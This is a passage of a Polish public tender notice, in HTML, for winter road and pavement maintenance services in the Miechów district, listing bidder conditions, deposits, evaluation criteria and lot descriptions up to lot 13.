Dla zadania 7   Wykonawca potwierdzi spełnianie warunku udziału w postępowaniu jeżeli wykaże, że wykonał  co najmniej jedną usługę  transportową  o wartości brutto min. 20 000 tys. zł oraz załączy dowody określające czy roboty te zostały wykonane w sposób należyty.

Dla zadań 8-16   Wykonawca potwierdzi spełnianie warunku udziału w postępowaniu, dla zadań 9-17  jeżeli wykaże, że wykonał  co najmniej jedną usługę związaną z pracą przy zimowym utrzymaniu nawierzchni chodników,  placów, obiektów inżynierskich  w sezonie zimowym o wartości brutto min. 4 000 tys. zł oraz załączy dowody określające czy roboty te zostały wykonane w sposób należyty.

Uwaga:  Wymieniony warunek będzie spełniony zarówno wtedy gdy Wykonawca składa ofertę na jedno zadanie  jak również na więcej niż jedno  zadanie, dla zad.8-16.


b)    wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami

Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje n/w sprzętem:

Dla zad.1: samochód  3-osiowy o napędzie 6x4- napędowe dwa mosty tylne  min.1 szt.
Dla zad.2: samochód  3-osiowy o napędzie 6x4- napędowe dwa mosty tylne  min.1 szt.
Dla zad.3: samochód  3-osiowy o napędzie 6x4- napędowe dwa mosty tylne  min.1 szt.
Dla zad.4: samochód  3-osiowy o napędzie 6x4- napędowe dwa mosty tylne  min.1 szt.
Dla zad.5: samochód  3-osiowy o napędzie 6x4- napędowe dwa mosty tylne  min.1 szt.
Dla zad.6: koparko-ładowarka o poj.łyżki 0,25m3 lub więcej   		      min. 1 szt.
Dla zad.7: samochód samowyładowawczy o ładowności min 24tony    	      min. 1 szt.
             Dla zadań od 8 do 16 nie jest wymagany wykaz sprzętu.

Uwaga:  Wykonawca składając  ofertę na  więcej niż jedno  zadanie musi udowodnić  że  dysponuje minimum jedna jednostką sprzętową dla każdego zadania którego dotyczy oferta.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">W celu potwierdzenia braku podstaw do wykluczenia wykonawcy z postępowania, o których mowa w art. 24 ust. 1 pkt 23 ustawy, wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej której udostępniono SIWZ informacji  o ofertach złożonych w postępowaniu zgodnie z art. 86 ust. 5 ustawy, składa stosownie do treści art. 24 ust. 11 ustawy, oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej oraz, w przypadku przynależności do tej samej grupy kapitałowej, dowody potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Wadium w wysokości:
zad.1-   1 500zł,   
zad.2-   1 500zł,
zad.3-   1 500zł,
zad.4-   1 500zł,
zad.5-   1 500zł,
zad.6-      500zł,
zad.7-      500zł,
zad.8-      500zł,
zad.9-      100zł,
zad.10-    200zł,
zad.11-    200zł,
zad.12-    200zł,
zad.13-    200zł,
zad.14-    200zł,
zad.15-    200zł,
zad.16-    200zł,
- należy wnieść przed upływem terminu składania ofert.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>czas reakcji</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zgodnie z zapisami określonymi w SIWZ.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 10/10/2016, godzina: 11:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>usługi zimowego utrzymania dróg świadczone pługo-piaskarką, zestaw Nr1  -  1szt.   [piaskarka Schmidt  nr inw.743/726/b i pług nr inw. 582-2-510,  własność ZDP, nośnik- samochód  3-osiowy o napędzie 6x4- napędowe dwa mosty tylne, własność wykonawcy]<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>      Przewidywany zakres: 10 800km<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90630000-2, 90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 20/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>czas reakcji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>usługi zimowego utrzymania dróg świadczone pługo-piaskarką,  zestaw Nr2  -  1szt.   [piaskarka typ PP-1 nr inw.582-3/503 i pług nr inw. 582-2-519,  własność ZDP, nośnik- samochód  3-osiowy o napędzie 6x4- napędowe dwa mosty tylne, własność wykonawcy]<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przewidywany zakres: 10 800km<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90630000-2, 90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 20/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>czas reakcji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>usługi zimowego utrzymania dróg świadczone pługo-piaskarką,  zestaw Nr3  -  1szt.   [piaskarka typ PP-1 nr inw.582-3/505 i pług nr inw. 9150-002, własność ZDP, nośnik- samochód  3-osiowy o napędzie 6x4- napędowe dwa mosty tylne, własność wykonawcy]<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przewidywany zakres: 10 800km<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90630000-2, 90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 20/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena </td><td>60</td></tr><tr><td>czas reakcji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>usługi zimowego utrzymania dróg świadczone pługo-piaskarką, zestaw Nr4  -  1szt.   [piaskarka Schmidt  nr inw.582-3/506 i pług nr inw. 582-2-511,   własność ZDP, nośnik- samochód  3-osiowy o napędzie 6x4- napędowe dwa mosty tylne, własność wykonawcy]<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>      Przewidywany zakres: 10 800km<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90630000-2, 90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 20/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>czas reakcji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>usługi zimowego utrzymania dróg świadczone pługo-piaskarką,  zestaw Nr5  -  1szt.   [piaskarka Schmidt  nr inw. 582-3/504 i pług nr inw. 9150-011,  własność ZDP, nośnik- samochód  3-osiowy o napędzie 6x4- napędowe dwa mosty tylne własność wykonawcy]<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>      Przewidywany zakres: 10 800km<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90630000-2, 90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 20/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>czas reakcji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b>usługi dotyczące zimowego utrzymania dróg wykonywane koparko-ładowarką (załadunek materiałów) o poj. łyżki co najmniej 0,25m3 lub więcej (sprzęt wykonawcy) - 1szt<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przewidywany zakres: 300godz.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>98300000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 20/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>czas reakcji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>7
                  
                <b>Nazwa: </b>transport materiałów do zimowego utrzymania dróg ze składowiska w Chrustach     k.Książa Wielkiego do Miechowa <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przewidywany zakres: 17km x 6500T= 110500 Tkm<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>60100000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 20/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>czas reakcji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>8
                  
                <b>Nazwa: </b>zimowe utrzymanie odcinków chodników przy ulicach i drogach powiatowych w Miechowie      na pow. 12 199m2 oraz w ciągu dr. powiatowej 1206K Jaksice do dr.kraj nr7 w m. Jaksice      na pow.371m2    materiał do posypywania Zamawiającego.  <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przewidywany zakres: 50dni (dzień=doba 24godz.)<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90630000-2, 90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 20/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>czas reakcji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>9
                  
                <b>Nazwa: </b>zimowe utrzymanie wiaduktu wraz z chodnikami i dojazdami w ciągu dr. powiatowej      1194K Gr. woj.- Kozłów  Książ Wielki  m. Kozłów       - materiał do posypywania Zamawiającego.          <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przewidywany zakres: 30dni (dzień=doba 24godz.)<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90630000-2, 90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 20/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>czas reakcji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>10
                  
                <b>Nazwa: </b>zimowe utrzymanie odcinków chodników w ciągu dr. powiatowej 1194K Gr. woj.- Kozłów       - Książ W m. Kozłów na pow.1356m2,  w ciągu dr. powiatowej 1198K Mierzawa        Sędziszów  Kozłów m. Kozłów na pow.94m2, w ciągu dr. powiatowej 1183K Kozłów-        Przybysławice  Łazy m. Kozłów na pow.193m2 i w ciągu dr. powiatowej 1180K Kozłów        Kępie  Charsznica m. Kępie na pow. 576m2  - materiał do posypywania Zamawiającego<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przewidywany zakres: 50dni (dzień=doba 24godz.)<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90630000-2, 90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 20/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena </td><td>60</td></tr><tr><td>czas reakcji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>11
                  
                <b>Nazwa: </b>zimowe utrzymanie odcinków chodników w ciągu dr. powiatowej 1172K Maków  Gołcza    Zerwana w m. Gołcza na pow. 2882m2, w ciągu drogi powiatowej 1204K Miechów (ul.Kolejowa)-Rzeżuśnia-Gołcza w m. Gołcza na pow. 447m2, w ciągu dr. powiatowej 1172K Maków  Gołcza Zerwana  w m. Wysocice na pow. 1059m2 i w ciągu dr. powiatowej 1174K Szreniawa  Przybysławice w m. Szreniawa na pow.1008m2  - materiał do posypywania  Zamawiającego.  <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przewidywany zakres: 50dni (dzień=doba 24godz.)<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90630000-2, 90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 20/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>czas reakcji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>12
                  
                <b>Nazwa: </b>zimowe utrzymanie chodnika w ciągu dr. powiatowej 1224K Bukowska Wola         Działoszyce   m. Słaboszów na pow. 1540m2, w ciągu dr. powiatowej 1194K gr.woj.-       Książ Wlk.-Słaboszów w m. Słaboszów na pow.495m2 i  w ciągu dr. powiatowej        1214K Małoszów  - Janowice w m. Janowice na pow. 289m2          materiał do posypywania  Zamawiającego.  <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przewidywany zakres: 50dni (dzień=doba 24godz.)<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90630000-2, 90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 20/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>czas reakcji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>13
                  
